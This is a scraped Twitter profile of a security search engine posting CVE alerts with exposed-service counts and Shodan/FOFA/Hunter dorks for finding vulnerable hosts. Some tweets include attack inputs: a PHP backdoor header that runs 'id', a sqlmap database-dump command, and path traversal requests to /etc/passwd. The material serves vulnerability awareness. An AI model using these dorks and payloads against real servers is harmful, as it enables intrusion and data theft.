Hunter
@HunterMapping
Followers
15,707
Following
187
Media
442
Statuses
1,300
Internet search engine for security researchers
Joined August 2022
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
Iran
• 530377 Tweets
Argentina
• 455031 Tweets
Kyle
• 288055 Tweets
Shapiro
• 255222 Tweets
Sunderland
• 177489 Tweets
オフサイド
• 119815 Tweets
Francia
• 103415 Tweets
#ErdoğanınYanındayız
• 96797 Tweets
Mascherano
• 76049 Tweets
Emily
• 74124 Tweets
pastor
• 68819 Tweets
Julian
• 64314 Tweets
Ron Paul
• 50923 Tweets
Adele
• 48713 Tweets
İsrail
• 41350 Tweets
BAUTISTA EN EL GRAN REX
• 37536 Tweets
Angola
• 37203 Tweets
残高不足
• 30668 Tweets
Fresh News for $XRP Holders
• 24185 Tweets
準々決勝進出
• 21606 Tweets
ムビチケ
• 20123 Tweets
ロッキン
• 19580 Tweets
FGOフェス
• 19470 Tweets
Otamendi
• 18483 Tweets
Zenón
• 17961 Tweets
#SmackDown
• 17522 Tweets
Simeone
• 17326 Tweets
Gabriel Sara
• 16670 Tweets
Aerosmith
• 16366 Tweets
Almada
• 14956 Tweets
Grant Fisher
• 12170 Tweets
Echeverri
• 11959 Tweets
バス会社
• 10362 Tweets
Pinned Tweet
🆕🆕JULY SPECIAL!!!!
📊Check out this insightful table revealing the most utilized Webcam services around the world! Stay informed and discover the trends shaping our digital world.
You can search for these on
USE QUERY product==""
Full
0
3
6
🚨Alert🚨New Outlook Exploit Unveiled: CVE-2023-35636 Leads to NTLM v2 Password Breach
⚠️This exploit enables attackers to intercept NTLM v2 hashes, which are used for authentication in Microsoft Windows systems.
📊910k+ Services are found on the
0
221
540
🚨Alert🚨CVE-2024-30103: Microsoft Outlook Remote Code Execution Vulnerability
⚠This Microsoft Outlook vulnerability can be circulated from user to user and doesn’t require a click to execute. Rather, execution initiates when an affected email is opened.This is notably dangerous
6
183
422
🚨Alert🚨CVE-2024-24919: A path traversal leading to an arbitrary file read!
🔥Deep Research:
⚠It is an arbitrary file read, allowing people to read any file on the system.
📊109K+ Services are found on
🔗Hunter
Observed several LATAM banks (CL,AR,CO,BR) vulnerable to this!!! Also, IT providers!
#csirt
#ir
#checkpoint
CVE-2024-24919
@1ZRR4H
5
64
253
7
126
384
🚨Alert🚨CVE-2024-4439: Unauthenticated Stored Cross-Site Scripting Vulnerability in WordPress Core
⚠It can be exploited by both unauthenticated and authenticated users under varying circumstances and be leveraged to inject malicious web scripts into pages.
🤖Affected Versions:
18
118
353
🚨Alert🚨CVE-2024-21413 Microsoft Outlook RCE Flaw
POC Released
📊219.8K+ Services are found on the
🔗Hunter:
Dorks 👇👇👇
Hunter:="Outlook Web App"
FOFA: app="Microsoft-Outlook"
Shodan:http.component:"outlook
1
113
343
🚨Alert🚨CVE-2024-36991: Path Traversal on the “/modules/messaging/“ endpoint in Splunk Enterprise on Windows
PoC:
📊257.4K Services are found on
🔗Hunter Link:
👇Search Query
Hunter: /product.name="Splunk
13
80
334
🚨Alert🚨CVE-2024-21378:Remote Code Execution in Microsoft Outlook
⚠New research has been published on how to discover and exploit the vulnerability️!
📊662K+ Services are found on
🔗Hunter:
Dorks 👇👇👇
Hunter:
5
117
305
🚨Alert🚨 CVE-2023-2982 # WordPress Social Login and Register authentication bypass 🔥9.8🔥
📎
Dork: "/wp-content/plugins/miniorange-login-openid"
Refer to:
@LanaCodes
#CVE
#infosec
#vulnerabilities
#Security
2
102
305
🚨Alert🚨CVE-2024-27348: Unauthenticated users can execute OS commands via Groovy injection in Apache HugeGraph-Server. Upgrade to version 1.3.0 to mitigate.
🔥Python Scanner:
📊200+ Services are found on
🔗Hunter
CVE-2024-27348 (RCE) - Unauth users can execute commands via Groovy injection in Apache HugeGraph-Server.
Fix: Upgrade to version 1.3.0
Python Scanner:
#bugbounty
#bugbountytip
#bugbountytips
3
49
243
1
87
305
🚨Alert🚨CVE-2024-3400: Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect(CVSS: 10)
⚠It enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.
📊 371K+ Services are found on
2
88
291
🔥POC
🚨Alert🚨CVE-2024-3400: Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect(CVSS: 10)
⚠It enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.
📊 371K+ Services are found on
2
88
291
1
98
292
🚨Alert🚨CVE-2024-4367/34342: JavaScript Flaws Threaten Millions of PDF.js and React-PDF Users
⚠Designated as CVE-2024-4367 in PDF.js and CVE-2024-34342 in React-PDF, this flaw leads to the execution of unrestricted JavaScript under the hosting domain’s context.
📊50K+ Services
3
83
290
🚨Alert🚨CVE-2024-22120 (CVSS 9.1): Zabbix SQLi Vulnerability Exposes IT Infrastructure to Attack
🔥PoC:
🔥PoC:
⚠This time-based SQL injection flaw poses a significant risk to systems running affected Zabbix, potentially allowing
1
86
276
🕹️ CVE-2023-25690: Request Smuggling attack on Apache HTTP Server 9.8 rating 🔥
HUNTER Search Drok :
Dorks on other platforms:
1⃣Shodan: product:"Apache httpd" version:"2.4.0"
2⃣FOFA: app="APACHE-HTTP_Server"
Refer:
7
108
272
🚨Alert🚨CVE-2024-34351:Next.js Server-Side Request Forgery in Server Actions
🔥PoC:
⚠A SSRF vulnerability was identified in Next.js Server Actions by security researchers at Assetnote. If the Host header is modified, and the below conditions are also
My colleague
@hash_kitten
and I discovered a full-read SSRF vulnerability in Next.js (CVE-2024-34351). We published our research today on
@assetnote
's blog: . Thank you to the Vercel team for a smooth disclosure process.
17
188
798
2
76
267
🚨Alert🚨CVE-2024-23692: Unauthenticated RCE Flaw in Rejetto HTTP File Server
🔥PoC:
📰Refer:
⚠It allows remote attackers to execute arbitrary code on affected servers without authentication, potentially leading to data breaches,
😲 Stephen Fewer of Rapid7 has shared the POC for my for Unauth RCE in Rejetto HTTP File Server 2.3m!
👉
👉
CVE: CVE-2024-23692
🚨 After an adjustment, RCE can now be achieved via SSRF without modifying the Host header! ⬇️
1
42
117
1
97
260
🚨Alert🚨CVE-2024-6387: Remote Unauthenticated Code Execution Vulnerability in OpenSSH server
🔗Hunter Link:
💼Scan Tool
@xaitax
:
⚠The vulnerability, which is a signal handler race condition in OpenSSH’s server (sshd), allows
0
79
263
🚨Alert🚨CVE-2023-50969: Critical Flaw in Imperva SecureSphere WAF Could Lead to Devastating Breaches
⚠ By manipulating the “Content-Encoding” headers in HTTP requests and sending specifically encoded POST data, attackers can effectively slip malicious payloads past the WAF’s
1
83
251
🚨Alert🚨CVE-2024-4879&CVE-2024-5217: ServiceNow Security Vulnerabilities Expose Businesses to RCE and Data Breaches
📊62.2K+ Services are found on
🔗Hunter Link:
👇Search Query
Hunter:/product.name="ServiceNow"
FOFA:
1
84
252
🚨Alert🚨CVE-2024-29895(CVSS:10): Critical Command Injection Vulnerabilities in Cacti:
🔥PoC:
⚠This vulnerability can be exploited remotely using the Cacti web interface, allowing an attacker to execute arbitrary commands on the Cacti server.
About CVE-2024-29895 . How to bypass cli_check. in
include/cli_check.php: define('CACTI_CLI_ONLY', true);
cmd_realtime.php is only accessible via local cli
Or it will throw
"<strong>This script is only meant to run at the command line.</strong>"
2
10
61
4
86
247
🚨Alert🚨CVE-2024-39907 (CVSS 9.8): SQLi Flaw Exposes 1Panel Users to Remote Takeover
🔥PoC:
📊26.3K+ Services are found on
🔗Hunter Link:
👇Search Query
Hunter:/product.name="1Panel"
FOFA: app="1Panel-Panel"
0
77
251
🚨Alert🚨CVE-2024-37079 & CVE-2024-37080 (CVSS scores: 9.8): Multiple heap-overflow vulnerabilities in the implementation of the DCE/RPC protocol!
⚠They could allow a bad actor with network access to vCenter Server to achieve remote code execution by sending a specially crafted
1
98
239
🚨Alert🚨CVE-2024-20931 Oracle A RCE vuln based on Weblogic T3\IIOP protocol
POC Released
📊10.9K+ Services are found on the
🔗Hunter:
Dorks 👇👇👇
Hunter:/product.name="WebLogic Server"
FOFA: protocol="WebLogic"
Shodan:
1
84
230
🚨Alert🚨
CVE-2024-29415: Popular Node.js Package ‘node-ip’ Exposes Millions to Potential SSRF Attacks
⚠Widely-used node-ip npm package, which is designed to retrieve a computer’s IPv4 addresses, has been identified to contain a serious SSRF vulnerability.
📊35.6M+ Services are
2
69
230
🚨Alert🚨
CVE-2024-4577: PHP CGI Argument Injection Vulnerability
⚠This oversight allows unauthenticated attackers to bypass the previous protection of CVE-2012-1823 by specific character sequences. Arbitrary code can be executed on remote PHP servers through the argument
0
62
230
🚨Alert🚨PHP 8.1.0-dev Backdoor Remote Code Execution
📊22K+ Services are found on the
👇Search Query
Hunter: =="PHP" and product.version=="8.1.0"
🔗Hunter Link:
🧙♀️Deep Dive:
Find a server running PHP 8.1.0-dev ❓
🚨 Check for easy RCE 🚨
👇 Payload:
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');
#bugbountytips
#bugbounty
#hackthebox
#cve
#hackernews
#cybersecurity
5
62
337
2
77
226
🚨Alert🚨CVE-2024-21762: Critical Fortinet FortiOS Out-of-Bound Write SSL VPN Vulnerability
⚠Fortinet released a security advisory for CVE-2024-21762. Bishop Fox analyzed the patch and developed a scanner to quickly determine if an appliance is affected by this vulnerability.
📊
2
69
213
🚨Alert🚨CVE-2024-3116: Remote Code Execution (RCE) in pgAdmin version 8.4 or below.(CVSS: 7.4)
⚠This vulnerability allows attackers to execute malicious code on servers running pgAdmin, potentially compromising the entire database system.
📊 1K+ Services are found on
0
59
212
🚨Alert🚨CVE-2023-20198: CISCO IOS XE RCE PoC Published by
@W01fh4cker
🔥PoC:
⚠Now, hackers across the entire spectrum of skill levels can gain full control over vulnerable routers and switches with shocking ease.
📊204K+ Services are found on
4
74
209
🚨Alert🚨CVE-2024-4985 (CVSS 10): Critical Authentication Bypass Flaw Found in GitHub Enterprise Server
🔥PoC:
⚠It could allow attackers to bypass authentication and gain unauthorized access to sensitive code repositories and data.
📊248K+ Services are
🔥Poc CVE-2024-4985
#Bypass
authentication
#GitHub
Enterprise Server
@HunterMapping
@the_yellow_fall
@fofabot
@Dinosn
2
24
79
3
76
208
🚨Alert🚨CVE-2023-46747 F5 BIG-IP Remote Code Execution Vulnerability
CVSS score:9.8
Hunter:
Dorks 👇👇👇
FOFA app="f5-BIGIP"
SHODAN product:"BIG-IP"
📰refer to
#infosec
#infosecurity
#Infosys
3
68
201
🚨Alert🚨CVE-2024-28995: High-Severity Directory Traversal Vulnerability affecting SolarWinds Serv-U.
🔥Deep Dive from
@rapid7
:
⚠SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on
0
69
201
🚨Alert🚨CVE-2024-40725&&CVE-2024-40898, affecting Apache HTTP Server versions 2.4.0 through 2.4.61
📊363.8M+ Services are found on
🔗Hunter Link:
👇Search Query
Hunter:/product.name=="Apache" and product.version=="2.4.0"
FOFA:
5
72
200
🆕🆕🆕Deep dive in !!!!!CVE-2024-29059
📰Leaking ObjRefs to Exploit HTTP .NET Remoting:
📰Leaking and Exploiting ObjRefs via HTTP .NET Remoting
📊 154M+ Services are found on the
0
68
194
🚨Alert🚨CVE-2024-1071: WordPress Ultimate Member Plugin is under active attack!
⚠It manifests in versions 2.1.3 to 2.8.2 of the Ultimate Member plugin which can lead to the extraction of sensitive information from the database, including password hashes.
📊 522k+ Services are
3
65
193
🚨Alert🚨CVE-2024-23897 (CVSS 9.8): Critical Jenkins Security Vulnerability, RCE Possible
⚠A critical vulnerability within Jenkins’ built-in command line interface (CLI), opens the door to arbitrary file reads through the CLI, potentially culminating in remote code execution
0
56
183
CVE-2024-4956: Nexus Repository Flaw
PoC:
🚨Alert🚨CVE-2024-4956:Nexus Repository Flaw Exposed, Software Supply Chains Threatened
⚠This vulnerability, discovered and responsibly reported by
@erickfernandox
, could allow attackers to access and download sensitive system files without authentication.
📊284K+ Services are
2
29
86
1
55
178
🚨Alert🚨CVE-2024-27497: Replace Your Linksys E2000 Router Now! There’s no fix in sight!
⚠A severe security flaw in the Linksys E2000 router lets hackers waltz right into your network.
📊 300+ Services are found on the
🔗Hunter Link:
3
56
173
🚨Alert🚨 CVE-2023-39777
#vBulletin
XSS Vulnerability
🧷
Dorks 👇👇👇
FOFA app="vBulletin"
Shodan http.html:"content=\"vBulletin"
💐💐💐Credit to
@truong_rong
#infosec
#infosecurity
#Infosys
0
45
172
🚨Alert🚨CVE-2024-36401 (CVSS 9.8): GeoServer Unauthenticated Remote Code Execution in Evaluating Property Name Expressions
🔥PoC:
📊6.4K+ Services are found on
🔗Hunter Link:
👇Search Query
Hunter:
1
41
177
🚨Alert🚨CVE-2024-21683(CVSS 8.3):RCE (Remote Code Execution) in Confluence Data Center and Server
⚠It allows an authenticated attacker to execute arbitrary code which has a high impact on confidentiality, integrity, and availability, and requires no user interaction.
📊1.7M+
1
60
168
🚨Alert🚨CVE-2024-30043: Abusing URL Parsing Confusion to Exploit XXE on SharePoint Server And Cloud
🔥PoC:
⚠This XXE injection vulnerability, one of the craziest XXEs that
@chudyPB
has ever seen ,allows you to:
·Read files with SharePoint Farm Service
My SharePoint XXE blog is live. URL scheme confusion allowed to bypass security measures delivered by XmlSecureResolver :)
2
27
94
0
59
169
🥳🥳🥳With
@pdiscoveryio
/Uncover, now easily search for exposed assets through API
THX
@xm1k3_
#hackwithautomation
#recon
#assetdiscovery
#security
#bugbounty
#bugbountytips
#infosecurity
#infosec
4
48
158
🚨Alert🚨CVE-2024-22245 & 22250: VMware Vulnerabilities Demand Immediate Action
⚠VMware has released an urgent security advisory regarding two critical vulnerabilities within its now-deprecated Enhanced Authentication Plug-in (EAP).
📊 312.7K+ Services are found on the
0
64
157
🚨Alert🚨CVE-2024-27956(CVSS 9.9 🔥): A WordPress SQL injection vulnerability in the WP-Automatic plugin
⚠More than 5.5 million attacks in just one month! Attackers can gain unauthorized access to websites and potentially take full control of them.
📊6K+ Services are found on
3
57
153
🚨PoC Released on CVE-2024-4879 - Jelly Template Injection Vulnerability in ServiceNow
🔥PoC Github:
🥳Video PoC:
🆕 New Research:
🚨Alert🚨CVE-2024-4879&CVE-2024-5217: ServiceNow Security Vulnerabilities Expose Businesses to RCE and Data Breaches
📊62.2K+ Services are found on
🔗Hunter Link:
👇Search Query
Hunter:/product.name="ServiceNow"
FOFA:
1
84
252
2
58
158
🚨Alert🚨 CVE-2023-28121
#WorPress
#WooCommerce
plugin Unauthorized Admin Access
📎
Dork: /wp-content/plugins/woocommerce-payments/
Path Diffing Analysis, with credit to
@MrTuxracer
#infosec
#vul
#bugbountytips
#cybersecurity
3
55
153
🚨Alert🚨CVE-2024-21677: Atlassian Confluence Path Traversal Vulnerability (CVSS:8.3)
⚠ It allows an unauthenticated attacker to exploit an undefinable vulnerability which has a high impact on confidentiality and requires user interaction.
📊 684K+ Services are found on the
1
39
150
🚨CVE-2024-23879🚨 Jenkins RCE
POC Released
Credit to binganao
🔗
#vulnerability
#infosecurity
🚨Alert🚨CVE-2024-23897 (CVSS 9.8): Critical Jenkins Security Vulnerability, RCE Possible
⚠A critical vulnerability within Jenkins’ built-in command line interface (CLI), opens the door to arbitrary file reads through the CLI, potentially culminating in remote code execution
0
56
183
2
42
148
🚨Alert🚨CVE-2024-29212: Veeam RCE Vulnerability Exposes Data Protection Services to Risk
⚠An attacker could remotely execute malicious code on the VSPC server machine, leading to possible data breaches or disruption of data protection services.
📊177K+ Services are found on
1
49
143
🚨Alert🚨CVE-2023-52251, CVE-2024-32030: Remote code execution in UI for Apache Kafka
🔥PoC:
⚠ Kafka UI is affected by two rce vulnerabilities. The first one in the message filtering component leads to execution of arbitrary unsandboxed groovy script. The
1
49
146
🚨Alert🚨 CVE-2023-3460 Unpatched
#WordPress
Ultimate Member Flaw 🔥9.8🔥
📎
Dork: "/wp-content/plugins/um-user-locations/"
Refer to:
#CVE
#infosec
#vulnerabilities
#Security
um-user-locations
4
43
135
🚨Alert🚨Atlassian Confluence CVE-2023-22527
RCE Vulnerability In Confluence Data Center and Confluence Server CVSS score:9.0
📊461k+ Services are found
Affected version: Atlassian Confluence Data Center and Server 8.0.x/ 8.1.x/8.2.x/8.3.x/8.4.x/8.5.0-8.5.3
🔗Hunter
1
48
140
🚨Alert🚨CVE-2024-2961: glibc Vulnerability Opens Door to PHP Attacks
⚠This vulnerability, which allows for out-of-bounds memory writes, could enable remote attackers to execute arbitrary code within the context of vulnerable PHP applications.
📊2.6K+ Services are found on
3
45
140
🚨Alert🚨 CVE-2023-3128
#Grafana
Account Takeover Vulnerability 🔥 9.4 🔥
📎
Other Dorks:
🫐FOFA app="Grafana"
🍓Shodan product:"Grafana (Open Source)"
Refer to:
#infosec
#vulnerabilities
#CVE
Today we are releasing Grafana 10.0.1, 9.5.5, 9.4.13, 9.3.16, 9.2.20, and 8.5.27, which include a critical security fix. If you are affected, we recommend that you install newly released versions.
0
15
34
0
45
140
🚨Alert🚨 CVE-2023-24243
#CData
#vulnerability
Search Link:
Other Dorks:
💁 Shodan: http.html:"CData Arc"
💁♂️ FOFA: body="CData Arc"
💁♀️ Censys: services.http.response.body:"CData Arc"
Huge shout-out to 🙌🙌🙌 :
@d3vc0r3
Refer to
1
33
132
🆕🆕🆕 Deep dive into the new RCE in Microsoft Outlook (CVE-2024-21378) from
@ptswarm
⚠They've tested the new RCE in Microsoft Outlook (CVE-2024-21378) in a production environment and confirmed it works well! No back connect required!
A brief instruction for red teams:
1.
🚨Alert🚨CVE-2024-21378:Remote Code Execution in Microsoft Outlook
⚠New research has been published on how to discover and exploit the vulnerability️!
📊662K+ Services are found on
🔗Hunter:
Dorks 👇👇👇
Hunter:
5
117
305
0
49
131
🚨Alert🚨CVE-2022-0412: Unauthenticated Blind SQL Injection in TI WooCommerce Wishlist WordPress plugin
⚠It is a time-based SQL injection but you can extract databases with just one command.
✈️sqlmap./py -r request./txt --dbs --random-agent --time-sec=12 --level=5 --risk=3
CVE-2022-0412 is time based sql injection but you can extract databases with this command
sqlmap./py -r request./txt --dbs --random-agent --time-sec=12 --level=5 --risk=3 --batch --flush-session
#bugbounty
#bugbountytips
4
59
243
0
48
132
🚨Alert🚨CVE-2024-2879: Critical Security Flaw Found in Popular LayerSlider WordPress Plugin(CVSS: 9.8)
⚠It could be abused to extract sensitive information from databases, such as password hashes.
📊 1.8M+ Services are found on the
🔗Hunter:
2
52
129
🚨Alert🚨CVE-2024-34750: Apache Tomcat DoS vulnerability in HTTP/2 connector
📊50.3K+ Services are found on
🔗Hunter Link:
👇Search Query
Hunter: web.title="Apache Tomcat/9.0.0"||web.title="Apache Tomcat/10.1.0"||web.title="Apache
4
43
128
🥳CALL BACK🥳
CVE-2020-5902 Unauthenticated Remote Code Execution in F5-Big-IP
📊3.2K+ Services are found on
🔥PoC:
🔗Hunter Link:
👇Search Query
Hunter:/product.name="BIG-IP Configuration Utility"
FOFA:
(Oneliner)CVE-2020-5902 Unauthenticated Remote Code Execution in F5-Big-IP
6
57
351
1
41
128
🚨Alert🚨
CVE-2024-29973: Unauthorized command injection in Zyxel NAS devices!!
🔥PoC:
⚠This command injection vulnerability in the “setCookie” parameter in Zyxel NAS326 and NAS542 devices could allow an unauthenticated attacker to execute some OS
3
50
127
🚨Alert🚨CVE-2024-20767: Critical Adobe ColdFusion Flaw Exposes Sensitive Files, PoC Published
⚠ An attacker could bypass security measures gain unauthorized access to sensitive files and perform arbitrary file system write!
📊 1.1K+ Services are found on the
0
36
126
🚨Alert🚨CVE-2024-5655(CVSS 9.6): Run pipelines as any user
🔗Hunter Link:
⚠This flaw allows attackers to trigger pipelines as another user under specific conditions, posing a significant security risk.
📊2.3M+ Services are found on
5
45
126
🚨Alert🚨 CVE-2023-36778
#MicrosoftExchangeServer
Remote Code Execution Vulnerability
🔗
Dorks 👇👇👇
FOFA app="Outlook-Web-App"
Shodan product:"Outlook Web App"
📰Refer to
🔗
#infosec
#infosecurity
#Infosys
0
52
123
🚨Alert🚨CVE-2024-34470: An Unauthenticated Path Traversal vulnerability in HSC Mailinspector
📊180+ Services are found on
🔗Hunter Link:
📰Refer:
👇Query
Hunter: web.title=="..:: HSC MailInspector ::.."
0
45
122
🚨Alert🚨CVE-2023-41056: Redis Remote Code Execution Vulnerability
Redis may incorrectly handle resizing of memory buffers which can result in incorrect accounting of buffer sizes and lead to heap overflow and potential remote code execution.
📊 1.4M+ services are found on the
0
41
122
🚨Alert🚨CVE-2024-20356: A Command Injection vulnerability in Cisco's CIMC! Jailbreaking a Cisco appliance to run DOOM
🔥PoC:
📰Deep Dive:
📊 3K+ Services are found on
🔗Hunter Link:
0
48
122
🚨Alert🚨 CVE-2023-27992
#Zyxel
#NAS
Critical (9.8🔥) Pre-authentication Command Injection
#Vulnerability
.
Search Link🧷:
web.body="res/jquery_api/"&&web.body="{version}"
Other Dorks:
👉FOFA body="res/jquery_api/"
👉Shodan http.favicon.hash:943925975
1
40
118
🚨Alert🚨CVE-2023-40054
Directory Traversal Remote Code Execution Vulnerability
🔗Hunter:
Dorks 👇👇👇
FOFA app="SolarWinds-Network-Management"
📰Refer to
#infosec
#infosecurity
#Infosys
#Vulnerability
#cybersecurity
0
41
117
🚨Alert🚨CVE-2024-31982: XWiki Remote code execution as guest via DatabaseSearch
🔥PoC and Bulk Scanner:
⚠XWiki's database search allows remote code execution through the search text. This allows remote code execution for any visitor of a public wiki or
0
44
118
🚨Alert🚨CVE-2024-4984: XSS on Yoast SEO plugin for WordPress
⚠Any user input inside sprintf() function is vulnerable to XSS, and there is a lot, even the WordPress core itself
📰Refer:
📰GitHub Advisory:
👇👇👇Hunter is currently
CVE-2024-4984: XSS on Yoast SEO plugin for WordPress, any user input inside sprintf() function is vulnerable to XSS, and there is a lot, even the WordPress core itself
#infosec
#bugbounty
#xss
4
26
180
1
34
115
🚨Alert🚨CVE-2023-48777
Critical Vulnerability in Elementor Affecting 5+ Million Websites
🔗Hunter:
Dorks 👇👇👇
FOFA app="WP-Elementor"
SHODAN http.component:"wordpress"
📰Refer to
#infosec
#infosecurity
#Infosys
1
34
112
🚨Alert🚨CVE-2023-52424: New WiFi Flaw Leaves All Devices Vulnerable to ‘SSID Confusion’ Attacks
⚠This vulnerability impacts all operating systems and WiFi clients!!!!! This flaw allows attackers to trick victims into connecting to a network with a spoofed SSID (network name),
Today, we published details of a new vulnerability arising from a design flaw in the IEEE 802.11 WiFi standard, identified in collaboration with renowned security expert
@vanhoefm
.
This vulnerability (CVE-2023-52424) impacts all operating systems and WiFi clients. (1/5)
3
118
403
0
43
113
🔥PoC Released on CVE-2024-28995: Automated Exploitation of SolarWinds Serv-U Path Traversal & Local File Read
🧐Credit:
@StuartBeck11
🔗Learn more here:
🚨Alert🚨CVE-2024-28995: High-Severity Directory Traversal Vulnerability affecting SolarWinds Serv-U.
🔥Deep Dive from
@rapid7
:
⚠SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on
0
69
201
2
36
113
🚨Alert🚨CVE-2024-37032: Probllama—Ollama Remote Code Execution Vulnerability
🔥PoC:
⚠The issue relates to a case of insufficient input validation that results in a path traversal flaw. An attacker could exploit to overwrite arbitrary files on the server
We found a Remote Code Execution (RCE) vulnerability in
@Ollama
- one of the most popular AI inference projects on GitHub. Here is everything you need to know about
#Probllama
(CVE-2024-37032) 🧵👇
24
359
2K
1
37
111
🚨Hackers exploit Aiohttp bug to find vulnerable networks
⚠CVE-2024-23334 exploitation just requires sending a simple HTTP request to the server with the path to any sensitive file.
📊 For example: `curl -v --path-as-is 'GET' '
http://0.0.0.0:8000/static/../../etc/passwd`
🔗PoC:
🚨Alert🚨CVE-2024-23334: Aio-libs aiohttp could allow a remote attacker to send a specially crafted URL request to view arbitrary files, which leads to directory traversal vulnerabilities.
📊 7.8M+ Services are found on
🔗Hunter
3
39
105
0
33
112
🚨Alert🚨
CVE-2024-28254/28255: Auth Bypass and SpEL Injection in OpenMetadata lead to a critical RCE (OOB Data Exfiltration).
🔥PoC:
📊 4.9K+ Services are found on
🔗Hunter Link:
👇Query
Hunter:
0
40
110
🚨Alert🚨 CVE-2023-36934 Yet another critical SQL injection uncovered in
#MOVEIt
Transfer
💡
Dorks on other platforms:
1⃣Shodan: http.favicon.hash:989289239
2⃣FOFA: icon_hash="989289239"
Refer to:
#bugbountytips
#infosecurity
3
35
105
🚨Alert🚨CVE-2024-23334: Aio-libs aiohttp could allow a remote attacker to send a specially crafted URL request to view arbitrary files, which leads to directory traversal vulnerabilities.
📊 7.8M+ Services are found on
🔗Hunter
CVE-2024-23334
Poc for windows: /static/../D:\flag.txt
Poc for Linux: /static/../../../../etc/passwd [need to fuzz "../"]
#aiohttp
#vulnerability
8
97
316
3
39
105
🚨Alert🚨CVE-2024-22233: A high-severity Spring Framework Vulnerability
⚠️This vulnerability allows an attacker to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition.
📊35k+ Services are found on the
0
40
104
😉😉😉
Need a
#Shodan
alternative?
Try
@HunterMapping
#CyberSecurity
#CTI
#ThreatIntel
#OSINT
#infosec
#intelligence
#investigation
#searchengine
#IoT
#passivescan
3
155
531
2
19
102
🚨Alert🚨CVE-2023-6317~6320: Researchers Discover LG Smart TV Vulnerabilities Allowing Root Access
⚠Multiple vulnerabilities have been disclosed in LG webOS running on its smart televisions that could be exploited to bypass authorization and gain root access on the devices.
📊
0
29
104
🚨Alert🚨 CVE-2023-7028&5356 GitLab Addresses Account Takeover & Command Flaws
Hunter query: ="Gitlab"
📊1.5m+ results are found worldwide
🔗Hunter:
📰
1
33
100
🕹️Alert CVE-2023-29489 0 Day cPanel XSS vulnerability
HUNTER Search Link 💡:
Dorks on other platforms:
1⃣Shodan: product:cPanel
2⃣FOFA: app="cPanel-MGMT-Products"
Refer to:
@assetnote
@pdnuclei
1
39
101
🚨Alert🚨 🇨 🇻 🇪-2023-35885
#CloudPanel
Zero-Day vulnerability
🧷
👇🏻 Other Dorks 👇🏻
FOFA icon_hash="151132309"
Shodan http.favicon.hash:151132309
🧐 Check out a deep dive(☕️POC) on this
📌
#Infosys
#infosec
#informationsecurity
1
38
99
🚨Alert🚨CVE-2024-39884: Source Code Disclosure with Handlers Configured via AddType in Apache HTTP Server 2.4.60
📊9.5K+ Services are found on
🔗Hunter Link:
👇Search Query
Hunter: header="Apache/2.4.60"
SHODAN: Server:
1
29
101
🔥PoC Released on CVE-2024-6387: A signal handler race condition in OpenSSH's server (sshd)
🔗Learn more here:
🚨Alert🚨CVE-2024-6387: Remote Unauthenticated Code Execution Vulnerability in OpenSSH server
🔗Hunter Link:
💼Scan Tool
@xaitax
:
⚠The vulnerability, which is a signal handler race condition in OpenSSH’s server (sshd), allows
0
79
263
2
27
99
🚨Alert🚨 CVE-2023-33308 🐸Yet Another
#Fortinet
Patches Critical
#RCE
Vulnerability 9.8 🔥
📎
Other Dorks:
Shodan: http.html_hash:1903206157
FOFA: body="app-id=1157004084"
Refer to
#infosec
#BugBounty
0
44
97
🚨Alert🚨TeamViewer Exploited to Obtain Remote Access, Deploy Ransomware
⚠Researchers claim attackers exploit vulnerabilities in TeamViewer to gain initial access to victim devices and then deploy the aggressive LockBit ransomware, which encrypts critical files and demands
0
44
96
🕹️ CVE-2023-2825: GitLab CE/EE Path Traversal Vulnerability 🔥
HUNTER Search Drok(Gitlab CE 16.0.0) :
Dorks on other platforms:
Shodan/FOFA: application-77ee44de16d2f31b4ddfd214b60b6327fe48b92df7054b1fb928fd6d4439fc7e.css
Refer:
0
40
93
🔥PoC for CVE-2024-27956(CVSS 9.9 🔥), Published by
@MrTuxracer
📊6K+ Services are found on
🔗Hunter Link:
Today, I took a few minutes to analyze the
#WordPress
Automatic Plugin CVE-2024-27956 (Unauthenticated Arbitrary SQL Execution)
#security
#vulnerability
. Turns out it is super easy to exploit.
Here is a basic PoC:
Since "q" is passed directly into a $wpdb->get_results() call,
11
146
596
6
36
95
🚨Alert🚨CVE-2024-6385(CVSS:9.6):GitLab Patches Critical Flaw Allowing Unauthorized Pipeline Jobs
⚖It's worth noting that the company patched a similar bug late last month (CVE-2024-5655) that could also be weaponized to run pipelines as other users.
📊2.4M+ Services are found
0
33
96
🚨Alert🚨 CVE-2023-5002
#pgAdmin
remote code execution vulnerability
🧷
Dorks 👇👇👇
FOFA icon_hash="2068826621"
Shodan http.favicon.hash:2068826621
📰 Refer to
#infosec
#infosecurity
#Infosys
9
26
92
🚨Alert🚨Path Traversal Affecting Multiple CData Products!!!!CVE-2024-31848/31849/31850/31851
🔥PoC:
⚠The issue exists because of a combination of how the embedded Jetty server and CData servlets handle requests.
📊2.5K+ Services are found on
1
30
93
🚨Alert🚨CVE-2024-28890: Critical Forminator plugin flaw in WordPress sites!
⚠It may allow a remote attacker to upload malware on sites using the plugin.
📰Refer:
📊 149K+ Services are found on the
🔗Hunter Link:
1
31
91
🚨Alert🚨CVE-2024-23112: An authorization bypass through user-controlled key vulnerability [CWE-639] in FortiOS and FortiProxy
⚠ It may allow an authenticated malicious user to gain access to another user’s bookmark via URL manipulation.
📊 3M+ Services are found on
0
38
93